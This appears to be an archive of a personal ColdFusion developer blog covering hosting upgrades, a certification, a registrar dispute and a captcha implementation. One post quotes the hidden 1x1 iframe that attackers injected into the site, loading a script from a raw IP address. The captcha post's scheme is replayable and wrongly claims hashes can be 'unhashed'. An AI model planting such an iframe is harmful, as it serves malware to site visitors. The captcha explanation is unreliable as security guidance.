Products

Products
Viewing By Category : Announcements / Main
August 7, 2009

ColdFusion 9 Beta Hosting Available

All of my sites are hosted by Crystaltech.com's ColdFusion plans and I've always been on top asking for the next CF version before they've gotten it. This time they have beaten me to the punch, offering the new CF 9 in beta for testing before I knew it was out myself, too busy to notice I guess. Hurray for Crystal Tech! Are they the first this time? Here's the email:

Dear Customer, ColdFusion 9 Beta plans are now available!

This latest iteration from Adobe includes many exciting new features and improvements that will make your life easier, including:

Adobe's first ever ColdFusion IDE, ColdFusion® Builder™

Better application performance with more granular control over code, templates, and applications

Language and database enhancements

And much more

After ordering your FREE Beta Plan, please share your thoughts in our CF9 Beta public forums. As one of the first developers to test-drive CF9 in a full-featured hosting environment, we'll be anxious to hear what you like as well as what needs improvement. We're thrilled to be the first host fully backed by Adobe to offer CF9 Beta, and hope you're as eager to experience it as we are to offer it. Please let your colleagues and other industry contacts know - in fact, feel free to tweet it from the virtual rooftops. Simply click the link below, login to your Twitter account, and either use the embedded message or create your own.

**Please note that the beta plan is only available on new site orders made at http://www.crystaltech.com/coldfusion9.aspx. The free beta is not available for existing site upgrades.

Happy Test-Driving! -The CrystalTech Team

August 1, 2009

New captcha added

Just got around to getting my captcha added to the comments entry for my blog. After about a year, of the 7500+ comments in my database only about 50 were legit! Finally had to make the upgrade when a spammer used it to do something really bad and my hosting provider delete my comments file. Well, cleaned out and ready to go again, sorry to those who got spammed by subscription notification emails, fixed now.

Here's the code I added to make it happen. Thanks to Ray Camden's blog about how to do it, or as I call "copy and paste help ;)".

...
<cffunction name="makeRandomString" returnType="string" output="false">
<cfset var chars = "23456789ABCDEFGHJKMNPQRS">
<cfset var length = randRange(2,5)>
<cfset var result = "">
<cfset var i = "">
<cfset var char = "">
<cfscript>
for(i=1; i <= length; i++) {
char = mid(chars, randRange(1, len(chars)),1);
result&=char;
}
</cfscript>
<cfreturn result>
</cffunction>
...
<cfif isDefined("form.addcomment")>
   <cfif hash(ucase(form.captcha)) neq form.captchaHash>
      <cfset errorStr = errorStr & "The text you entered for the image did not match. Please try again.<br />">
</cfif>
</cfif>
...
<cfset captcha = makeRandomString()>
<cfset captchaHash = hash(captcha)>
<cfimage action="captcha" width="155" height="35" text="#captcha#">
<input type="hidden" name="captchaHash" value="#captchaHash#">

The hash stuff is to make sure the spambot doesn't do a simple search for the actual captcha text in the hidden form and use it. In simple terms, you need the actual captcha text in a hidden field for validation on submit but you don't want anything to be able to read it except your script, so you hash it then unhash it.

November 30, 2007

ColdFusion MX 7 Certified!

I took my Certified ColdFusion MX 7 Developer Exam today and passed!

Score: 98%
Advanced Certified ColdFusion MX 7 Developer

Flex and Java certs are planned early 2008.

October 1, 2007

Adobe conferencing and new portal

Adobe Developer Center: http://www.adobe.com/devnet/ - A new consolidated portal with everything you need to build on the Adobe platform and products.

Adobe Acrobat Connect: http://www.adobe.com/products/acrobatconnect/ - Web conferencing from Adobe, free 15 day trial, $39/month. Unlimited meetings up to 15 ppl. Screen share, phone connect, whiteboard, chat, audio. Flex interface.

August 20, 2007

ColdFusion 8 (aka Scorpio) upgrade.

Today is a big day for my blog. I will be entering 3 or 4 new entries today. I've held off for a few days posting anything because I'm antisipating a server upgrade to ColdFusion 8. Why am I holding off posting blog entries you ask?

CrystalTech, the hosting provider of my web site, has stated that their intermediate plan, the one I have right now, will no longer support MySQL 4 or MSSQL. Only MySQL 5. My database is currently version 4. It's no big deal to move to version 5, but they will have to delete my current database and then I will have to recreate (move) my old data to the new database. I put a backup on my local drive to migrate with but if I put in an entry and miss a backup, I'll lose some data.

Any ways, the rest is jibber jabber. The important thing is that my site is moving to ColdFusion 8 so I can start doing some cooler stuff and making some tutorials and such that actually work. I think I'll start with the new cfimage tag in few days.

For now I'm trying to figure out a way to put those video tutorials I promised on my site. After looking into actually putting them on and the amount of space and such that it would take, I had to find another solution because I could only fit about 40 ten minute videos with my amount of space. I needed more space for the same price. So I'm thinking about just uploading them to Youtube and linking here. The only problem is that I would have full control and what if they changed something or deleted them or something. So I'm thinking still.

April 20, 2007

Video Tutorials Coming Soon!!!

Creating web based tutorials has traditionally been done using what I call the linear method of tutorial production. This is simply a text and images style of showing how to do something in steps. This way to me is much too time consuming and way too boring. Enter the 21st century..

The technology for screen and audio recording is available, so why not use it, right? Introducing a new tutorial source right here on CFCDeveloper.com. I can get work done and show you some tricks at the same time, how cool would that be!

The "Creating an MVC ColdFusion OOP Application" tutorial I started here in text form will be discontinued in favor for video and audio.

Stay tuned...

April 5, 2007

Adobe Beta Testing

I just signed up for Adobe's beta testing programming. A guy at work is a beta tester and he recommended I signed up, seeing how we're big time users of Adobe products, and we both have a blog (possible reviews!). I'm waiting now to see if I get choosen. It would be nice to post product reviews before they hit the market, fresh content.

April 3, 2007

Is Registerfly.com Stealing My Domain Name?

How else can I put it, they suck. Do not register through Registerfly.com. I've always had problems with them in the past and now it is threatening this site's vey existance. The whois info for my site, this one, is set to Registerfly.com info, but I can't get it changed through my account, it just doesn't work. They've taken my domain name hostage and won't allow me to change whois info so that I can get it transfered to another registrar. It expires in a month or two and I could end up losing it. I have sent them the following email:

TO: REGISTERFLY.COM, Inc.
960 Author Godfrey Road
Suite 402
Miami Beach, FL. 33140

The domain name cfcdeveloper.com was purchased through you, RegisterFly.com, under the agreement that the owner would retain ownership and be able to make changes as needed including the ability to transfer management to another registrar of owners choice. You are in violation of this agreement and are presently commiting fraud against the consumer. Several attempts have been made to contact your office including submitting 2 support tickets and calling several times with no response. The Domain Whois "Modify Contact Information" feature on your site is not operating correctly. An information change request was submitted 2 days ago and you have ignored it. This is a demand that you change the Whois Administrative Contact information for cdcdeveloper.com to the following:

xxxxxxx

You have 24 hours to comply and your local government consumer-protection agencies will be contacted for further action. This includes Miami-Dade County's Consumer Services Department and the Attorney General at the Miami-Dade County Economic Crime Division. As well as The Better Business Bureau and the International Consumer Protection and Enforcement Network. Please comply ASAP.

Thank you,

xxxxxxx

-----------------------------------------------------

Links:
Registerfly.com Sucks - Funny
Registerfly.com Lawsuit
Even a search on Registerfly at Google brings up negative results.

Update (4-12-2007):
Oh happy days! I don't know if it was the constant nagging and emails or the manner in which I asked it, but I got my domain name back now. The final straw was emailing Registerfly every 2 days until they did something. I emailed compliance@registerfly.com. I used the subject "Can't change whois - 4th email attempt", and included account name and domain name. Finally Robert Oniell answered back today that it has been fixed. Then I transfered it to Godaddy.

April 1, 2007

ATTACK!

My site was compromised. I don't know if it was on purpose or by my hosting company or what, but it was a compromise none the less.

Basically they added the following code to my index page at the top:

<!-- ~ --><iframe src="http://81.95.145.234/traff/in.cgi?7" width=1 height=1></iframe><!-- ~ --><!-- ~ --><!--iframe src="http://81.95.145.234/traff/in.cgi?7" width=1 height=1></iframe--><!-- ~ -->

Be aware.

February 10, 2006

MM takes over Adobe?!

Could this be?? Adobe retiring top execs to make room for Macromedia execs? Good news or bad, you decide. Will the new responsibilities take MM execs minds off of MM business? Or will they be able to take Adobe products to the next level, maybe a merging of technologies?

Originally heard from: www.web-relevant.com


Copyright © 2005-2006 Clint Willard. All rights reserved.
Aura skin for Clint Willard's BlogCFC inspired by Brooks Bilson's Bolg.
All trademarks property of their owners.